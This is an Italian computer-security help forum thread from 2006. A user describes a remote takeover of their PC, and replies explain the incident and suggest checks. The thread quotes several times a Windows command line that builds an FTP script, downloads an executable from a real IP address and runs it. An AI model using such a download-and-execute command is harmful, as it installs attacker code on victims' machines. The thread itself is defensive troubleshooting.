Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

L'Europa conta nella tecnologia e può essere autonoma. Cosa si è detto al Nextcloud Summit 2026
L'Europa conta nella tecnologia e può essere autonoma. Cosa si è detto al Nextcloud Summit 2026
La parola d'ordine al Nextcloud Summit 2026, che si è tenuto a Monaco, è stata "sovranità". Non come è spesso usato questo termine in politica ma, al contrario, come capacità positiva di decidere il proprio destino tecnologico, con modalità collaborative e aperte. L'Europa dice già molto nel mondo open source, che viene visto come mezzo per ottenere la tanto agognata autonomia digitale
Dreame X60 Pro Ultra Complete: i bracci si estendono sempre di più
Dreame X60 Pro Ultra Complete: i bracci si estendono sempre di più
Dreame X60 Pro Ultra Complete implementa due bracci estensibili, per spazzola e moccio, che si spingono ben oltre quanto visto sino ad oggi permettendo una pulizia di casa ancor più capillare e precisa
TCL 65C8L, la recensione del SQD-Mini LED da 4400 nit misurati
TCL 65C8L, la recensione del SQD-Mini LED da 4400 nit misurati
La tecnologia SQD-Mini LED di TCL arriva sul taglio da 65 pollici con la serie C8L: 2040 zone, pannello WHVA 2.0 e un picco che alle rilevazioni delle sonde tocca i 4400 nit nel profilo Filmmaker e un HDR quasi perfetto
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 14-11-2006, 15:57   #1
mibfb
Member
 
Iscritto dal: Feb 2003
Messaggi: 49
[help] effetto a cui non so dare spiegazione

salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie
mibfb è offline   Rispondi citando il messaggio o parte di esso
Old 14-11-2006, 17:01   #2
GmG
Senior Member
 
L'Avatar di GmG
 
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2059
Quote:
Originariamente inviato da mibfb
salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie

Non è qualcuno che ti è entrato nel pc ma hai qualcosa nel pc che ha usato dei comandi da prompt per scaricare con FTP il file 84785_norton.exe e poi eseguirlo.
GmG è offline   Rispondi citando il messaggio o parte di esso
Old 14-11-2006, 20:06   #3
mibfb
Member
 
Iscritto dal: Feb 2003
Messaggi: 49
si ma il norton questa cosa me la dovrebbe trovare giusto? e poi come e' avvenuto il fatto mi ha fatto proprio pensare a un attacco visto cheho visto partire il mouse andare su start aprire l'esegui e incollare quella stringa e lanciare.
mibfb è offline   Rispondi citando il messaggio o parte di esso
Old 15-11-2006, 18:15   #4
blackbit
Senior Member
 
Iscritto dal: Aug 2006
Città: Reggio Calabria
Messaggi: 1774
più ke comando remoto sembra proprio desktop remoto! xkè il mouse da solo non si muove.

stacci attento, proteggiti a dovere ke internet non è un giardinetto
blackbit è offline   Rispondi citando il messaggio o parte di esso
Old 16-11-2006, 21:41   #5
bReAkDoWn
Senior Member
 
L'Avatar di bReAkDoWn
 
Iscritto dal: Jun 2003
Città: ..By The Sea..
Messaggi: 564
Quote:
Originariamente inviato da mibfb
salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie
Avevi mica attivo un server winvnc? Altrimenti potresti avere una backdoor che permette a un utente remoto di eseguire operazioni sul tuo pc. Fai in ogni caso qualche scansione online.

Come giustamente ti hanno detto, qualcuno o qualcosa ha scaricato ed eseguito quel file sul tuo pc, ma quello che è strano è il modo in cui è stato eseguito il comando. Fosse stato un trojan o cmq un programma in esecuzione sul tuo pc, avrebbe scelto la strada più difficile e allo stesso tempo plateale per eseguire quella operazione. Infatti un programma avrebbe potuto tranquillamente scaricare ed eseguire il file senza che tu ti accorgessi di niente, e anche a livello di codice sarebbe stato molto più semplice che far spostare il mouse, eseguire un click ecc. Inoltre considerando l'indirizzo a cui ti hanno fatto accedere, l'ipotesi di intervento manuale si rafforza.
Esso infatti corrisponde ad adsl-77-183.37-151.net24.it: una adsl di libero. Probabilmente questo qualcuno ha aperto un server ftp sul suo pc e l'ha utilizzato temporaneamente per far arrivare quel file sul tuo computer lanciando una sessione ftp.
Infine, se vuoi sapere cosa abbia fatto quel file, l'unica cosa che puoi fare è provare a cercarlo nel tuo pc. Esegui anche tu cmd, poi esegui dir e guarda se il file c'è ancora. Se non lo trovi lì prova a cercarlo in tutte le cartelle con la funzione trova file o cartelle di windows.
__________________
Without Contraries is no Progression...
bReAkDoWn è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


L'Europa conta nella tecnologia e può essere autonoma. Cosa si è detto al Nextcloud Summit 2026 L'Europa conta nella tecnologia e può ess...
Dreame X60 Pro Ultra Complete: i bracci si estendono sempre di più Dreame X60 Pro Ultra Complete: i bracci si esten...
TCL 65C8L, la recensione del SQD-Mini LED da 4400 nit misurati TCL 65C8L, la recensione del SQD-Mini LED da 440...
MSI Maestro 500 Wireless: ANC e 90 ore di autonomia a 70 euro MSI Maestro 500 Wireless: ANC e 90 ore di autono...
NL-LC1 è il primo dissipatore a liquido AIO di Noctua: silenzio è la parola d'ordine NL-LC1 è il primo dissipatore a liquido A...
Engwe O20 Boost: abbiamo provato in ante...
UWANT V800: addio al rullo rotante, l’as...
Keenetic Stellar 6 porta il WiFi 6 negli...
Instagram spinge sul formato orizzontale...
DMA, l'UE verso la designazione di AWS e...
Dalla fisica quantistica alla fibra: il ...
TikTok, il 59% dei video è AI Slop, 'sch...
Batterie stampate in 3D: la forma libera...
Honor X80 Pro Max ufficiale: vi bastano ...
HONOR Watch 6: batteria infinita, modali...
Windows 11, addio alle ricerche sul web:...
La vera sfida dell’IA non è adott...
Signal contro l'AI agentica: dare ai cha...
Amazon: l'human-in-the-loop non basta a ...
HONOR 600 Lite: design in metallo e batt...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 20:59.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v